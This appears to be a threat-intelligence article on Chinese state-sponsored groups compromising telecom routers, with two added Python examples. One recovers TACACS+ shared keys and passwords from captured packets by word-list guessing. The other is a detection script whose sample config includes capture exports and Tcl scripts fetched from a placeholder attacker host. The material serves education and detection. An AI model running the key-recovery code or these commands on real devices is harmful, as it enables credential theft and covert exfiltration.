How Chinese State-Sponsored APT Actors Exploit Routers for Stealthy Cyber Espionage 

Chinese state-sponsored APT groups target global telecom, government, and military networks, exploiting router vulnerabilities for stealthy, long-term cyber espionage since 2021.

September 3, 2025 · 4 min read
Chinese state-sponsored cyber espionage campaigns have been reportedly targeting critical sectors across the globe. From telecommunications and government to transportation, lodging, and military operations, cyber actors linked to the People’s Republic of China (PRC) are conducting extensive, stealthy operations to infiltrate and control key network devices. This ongoing cyber onslaught has been documented by leading government agencies, revealing a complex web of tactics designed for long-term access and data extraction. 

Since at least 2021, Chinese state-sponsored Advanced Persistent Threat (APT) groups have been actively compromising core networking infrastructure, particularly focusing on large backbone routers within major telecommunications providers. These malicious actors exploit vulnerabilities in provider edge (PE) and customer edge (CE) routers to gain initial access and then move laterally through trusted network connections to infiltrate broader enterprise environments. 

Cybersecurity agencies often identify these groups with names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. Despite different monikers, these actors share similar tactics, techniques, and procedures (TTPs) and are collectively referred to in official advisories simply as “APT actors.” Their reach is global, with confirmed operations in countries including the United States, Australia, Canada, New Zealand, the United Kingdom, and multiple others. 

Collaborative Intelligence Efforts 

The global nature of this cyber espionage campaign has spurred an unprecedented coalition among international intelligence and cybersecurity agencies. In a joint Cybersecurity Advisory (CSA), organizations such as the U.S. National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Defense Cyber Crime Center (DC3), alongside counterparts from Australia, Canada, New Zealand, the UK, Europe, and Japan, outlined the threat landscape and mitigation strategies. 

This unified effort stresses the severity and persistence of the threat, urging network defenders worldwide to proactively hunt for signs of compromise consistent with the observed behaviors of these Chinese state-sponsored actors. Defenders are advised to maintain up-to-date mitigations in compliance with local regulations. 

The Anatomy of Chinese Cyber Espionage Operations 

Chinese APT actors target telecommunications and internet service providers (ISPs), as well as sectors like lodging and transportation, to harvest data that facilitates global surveillance and intelligence gathering.  

Their operations often link back to Chinese entities reportedly providing cyber capabilities to the PRC’s intelligence community, including units within the People’s Liberation Army and the Ministry of State Security. Companies such as Sichuan Juxinhe Network Technology, Beijing Huanyu Tianqiong Information Technology, and Sichuan Zhixin Ruijie Network Technology have been implicated in these efforts. 

Cybersecurity firms monitoring this activity have noted the extensive use of publicly known vulnerabilities, Common Vulnerabilities and Exposures (CVEs), to establish initial footholds. While no zero-day exploits have been confirmed, these actors adapt quickly, exploiting weaknesses in routers, firewalls, and switches from global vendors. 

Key exploited vulnerabilities include: 

  • CVE-2024-21887: Ivanti Connect Secure web-component command injection. 
  • CVE-2024-3400: Palo Alto Networks PAN-OS GlobalProtect remote code execution. 
  • CVE-2018-0171: Cisco IOS and IOS XE Smart Install remote code execution. 

These flaws allow attackers to remotely execute code, escalate privileges, and commandeer management interfaces, often chaining exploits to seize full control over targeted devices. 

Maintaining a Stealthy Foothold 

Once inside, Chinese state-sponsored actors modify router configurations to secure persistent access. This includes altering Access Control Lists (ACLs) to allow traffic from attacker-controlled IP addresses and exposing services on both standard and non-standard ports, such as SSH, SFTP, RDP, FTP, HTTP, and HTTPS. These tactics help evade detection by conventional security tools that monitor typical port activity. 

Notably, these actors exploit advanced router capabilities such as Cisco’s embedded Tcl scripting, SNMP enumeration, and embedded Linux containers (Guest Shell environments) to run native commands stealthily. They also carry command-and-control (C2) traffic over GRE, multipoint GRE (mGRE), or IPsec tunnels. GRE itself provides no confidentiality, so only the IPsec variants are actually encrypted, but all three blend C2 traffic with normal network operations for covert communication. 

The deployment of multi-hop pivoting tools like STOWAWAY enables encrypted chained relays, facilitating remote shells, file transfers, and proxying through multiple compromised nodes, complicating detection and response efforts. 

Harvesting Data Through Native Router Capabilities 

On compromised Cisco routers, the actors use the native packet-capture capability of the device to collect traffic of interest. TACACS+ and RADIUS authentication exchanges are the prime target: TACACS+ only obfuscates the packet body with an MD5-derived keystream built from the shared secret, RADIUS only obfuscates the User-Password attribute, and either protocol may be configured to run in the clear, so captured packets yield credentials to anyone who holds or can guess the shared secret.  

Attackers enable Cisco’s Embedded Packet Capture feature to siphon credentials, writing capture files with names like “mycap.pcap” or “tac.pcap” and exporting them to attacker-controlled IP addresses, where the captured logins are recovered offline. 
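The following added example (not from the advisory or from Cyble) shows why an exported TACACS+ capture is so valuable. It builds one PAP authentication START packet with a constructed shared key, then recovers the key and the credentials from the raw packet by trying candidate keys offline, as an attacker holding a stolen PCAP and a word list would. The pad construction is the one RFC 8907 specifies; the key, username, password, port, and session ID are placeholders.

```python
"""TACACS+ START-packet obfuscation (RFC 8907) and offline key recovery from a
captured packet.  Added example with placeholder key, user and password."""
import hashlib
import struct

TAC_PLUS_VERSION = 0xC0          # major 12, minor 0
TAC_PLUS_AUTHEN = 0x01           # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01
AUTHEN_LOGIN, AUTHEN_TYPE_PAP, AUTHEN_SVC_LOGIN = 0x01, 0x02, 0x01
HEADER = "!BBBB4sI"              # version, type, seq_no, flags, session_id, length


def keystream(session_id: bytes, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 pseudo-pad: MD5_1 = MD5(session_id, key, version, seq_no);
    MD5_n = MD5(session_id, key, version, seq_no, MD5_{n-1}); concatenate and truncate."""
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(session_id + key + bytes([version, seq_no]) + prev).digest()
        pad += prev
    return pad[:length]


def crypt(session_id, key, version, seq_no, body):
    """XOR the body with the pad; the same call encrypts and decrypts."""
    pad = keystream(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_pap_start(key, session_id, user, password, port=b"tty0", rem_addr=b"192.0.2.50"):
    """Client-side authentication START carrying a PAP password (constructed packet)."""
    body = struct.pack("!8B", AUTHEN_LOGIN, 1, AUTHEN_TYPE_PAP, AUTHEN_SVC_LOGIN,
                       len(user), len(port), len(rem_addr), len(password))
    body += user + port + rem_addr + password
    header = struct.pack(HEADER, TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, 1, 0, session_id, len(body))
    return header + crypt(session_id, key, TAC_PLUS_VERSION, 1, body)


def parse_start_body(body):
    """Parse a candidate plaintext START body; None if it is not well-formed.
    The length-consistency and range checks are what let a wrong key be rejected
    (a wrong key turns the body into random bytes that almost never pass them)."""
    if len(body) < 8:
        return None
    action, priv_lvl, atype, svc, ul, pl, rl, dl = struct.unpack("!8B", body[:8])
    if action != AUTHEN_LOGIN or priv_lvl > 15 or not 1 <= atype <= 8:
        return None
    if 8 + ul + pl + rl + dl != len(body):
        return None
    user, rest = body[8:8 + ul], body[8 + ul:]
    port, rest = rest[:pl], rest[pl:]
    rem_addr, data = rest[:rl], rest[rl:rl + dl]
    if not (user.isascii() and port.isascii()):
        return None
    return {"user": user, "port": port, "rem_addr": rem_addr,
            "password": data if atype == AUTHEN_TYPE_PAP else None}


def recover_credentials(packet, candidate_keys):
    """Attacker view: given a sniffed START packet and a word list of shared
    secrets, return (key, parsed body), (b"", body) if unencrypted, or (None, None)."""
    version, ptype, seq_no, flags, session_id, length = struct.unpack(HEADER, packet[:12])
    body = packet[12:12 + length]
    if ptype != TAC_PLUS_AUTHEN:
        return None, None
    if flags & TAC_PLUS_UNENCRYPTED_FLAG:      # body is already in the clear
        return b"", parse_start_body(body)
    for key in candidate_keys:
        parsed = parse_start_body(crypt(session_id, key, version, seq_no, body))
        if parsed is not None:
            return key, parsed
    return None, None


if __name__ == "__main__":
    pkt = build_pap_start(b"cisco123", b"\x12\x34\x56\x78", b"netadmin", b"Summer2025")
    print(recover_credentials(pkt, [b"wrong", b"secret", b"cisco123"]))
```

The practical lesson is that the TACACS+ shared secret is the only thing standing between a PCAP and the credentials it carries; a guessable secret, or a secret stored in a configuration the attacker already has, makes the capture equivalent to cleartext.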

The manipulation of Authentication, Authorization, and Accounting (AAA) configurations serves to enhance these tactics, allowing attackers to weaken authentication methods or redirect logs to external servers they control. 

Post-compromise, Chinese state-sponsored actors create user accounts with elevated privileges, often leveraging weak default credentials (like “cisco”/“cisco”) or cracking hashed passwords stored in router configurations. They mirror traffic for collection with SPAN and RSPAN port mirroring, scan for open ports and services, execute commands through SNMP, SSH, and HTTP interfaces, and manipulate routing tables and logs to cover their tracks. 
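A starting point for the configuration hunt the preceding sections imply (ACL and port changes, Tcl and Guest Shell use, tunnel interfaces, packet-capture exports, AAA and logging changes, and new privilege-15 accounts), as an added example that is not part of the advisory or of Cyble’s material: it runs a set of pattern checks over a constructed set of lines in Cisco IOS syntax. The trusted-host sets, the IP addresses, usernames, and the sample lines are placeholders; the monitor capture lines are EXEC-mode commands that would come from command accounting or archive logs rather than from the running-config.

```python
"""Pattern-based hunt over Cisco IOS-style lines for the changes described above.
Added example: constructed input, placeholder addresses, not the advisory's tooling."""
import re
from collections import Counter

# Hosts legitimately allowed to reach management, and the log collectors the
# organisation actually runs (both hypothetical allowlists).
TRUSTED_MGMT_HOSTS = {"10.0.0.5"}
TRUSTED_LOG_HOSTS = {"10.0.0.20"}
STANDARD_MGMT_PORTS = {22, 80, 443}

# Constructed running-config plus command-log lines; 198.51.100.10 and
# 203.0.113.77 play the attacker-controlled addresses.
SAMPLE_LINES = """\
hostname edge-pe-1
username netops privilege 15 secret 5 $1$xyz$placeholder
username svc_backup privilege 15 password 0 cisco
aaa new-model
aaa authentication login default group tacacs+ none
logging host 10.0.0.20
logging host 203.0.113.77
ip access-list extended MGMT-IN
 permit tcp host 10.0.0.5 any eq 22
 permit tcp host 198.51.100.10 any eq 22
 permit tcp host 198.51.100.10 any eq 57001
 deny ip any any
ip http server
ip http port 8181
ip ssh port 57001 rotary 1
scripting tcl init tftp://198.51.100.10/init.tcl
interface Tunnel100
 tunnel mode gre ip
 tunnel destination 198.51.100.10
monitor capture mycap interface GigabitEthernet0/0 both
monitor capture mycap export tftp://198.51.100.10/mycap.pcap
""".splitlines()

# Each check is (finding name, regex).  Matches are leads for an analyst to
# compare against the device's known-good baseline, not verdicts.
CHECKS = [
    ("priv15_local_user", re.compile(r"^username\s+\S+\s+privilege\s+15\b")),
    ("weak_local_password", re.compile(r"^username\s+\S+.*\bpassword\s+0\s+\S+")),
    ("aaa_fallback_none", re.compile(r"^aaa authentication\s.*\bnone\b")),
    ("tcl_or_guestshell", re.compile(r"^(?:scripting tcl|app-hosting appid guestshell|guestshell)\b")),
    ("tunnel_interface", re.compile(r"^\s*tunnel (?:mode|destination)\s")),
    ("packet_capture_export", re.compile(r"^monitor capture\s+\S+\s+export\s+\S+")),
    ("span_session", re.compile(r"^monitor session\s+\d+\s+destination\b")),
]
RX_MGMT_PORT = re.compile(r"^ip (?:http (?:secure-)?port|ssh port)\s+(\d+)")
RX_LOG_HOST = re.compile(r"^logging host\s+(\S+)")
RX_ACL_PERMIT = re.compile(r"^\s*permit\s+\S+\s+host\s+(\S+)")


def audit(lines, trusted_mgmt=TRUSTED_MGMT_HOSTS, trusted_log=TRUSTED_LOG_HOSTS):
    """Return (finding, line number, line) triples for every suspicious line."""
    findings = []
    for n, line in enumerate(lines, 1):
        for name, rx in CHECKS:
            if rx.search(line):
                findings.append((name, n, line.strip()))
        m = RX_MGMT_PORT.match(line)
        if m and int(m.group(1)) not in STANDARD_MGMT_PORTS:
            findings.append(("nonstandard_mgmt_port", n, line.strip()))
        m = RX_LOG_HOST.match(line)
        if m and m.group(1) not in trusted_log:
            findings.append(("untrusted_log_host", n, line.strip()))
        m = RX_ACL_PERMIT.match(line)
        if m and m.group(1) not in trusted_mgmt:
            findings.append(("acl_permit_unknown_host", n, line.strip()))
    return findings


def summarize(findings):
    """Count findings per category, for a quick triage view."""
    return dict(Counter(name for name, _, _ in findings))


if __name__ == "__main__":
    for name, n, line in audit(SAMPLE_LINES):
        print(f"{name:24s} line {n:2d}: {line}")
    print(summarize(audit(SAMPLE_LINES)))
```

Run against a fresh configuration export and the device’s command-accounting records, and diff the findings against a known-good baseline: a privilege-15 account or a permit entry that was always there is noise, while a new one, an AAA method list that falls back to none, or a capture exported to an address nobody recognises is exactly the kind of change the advisory describes.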
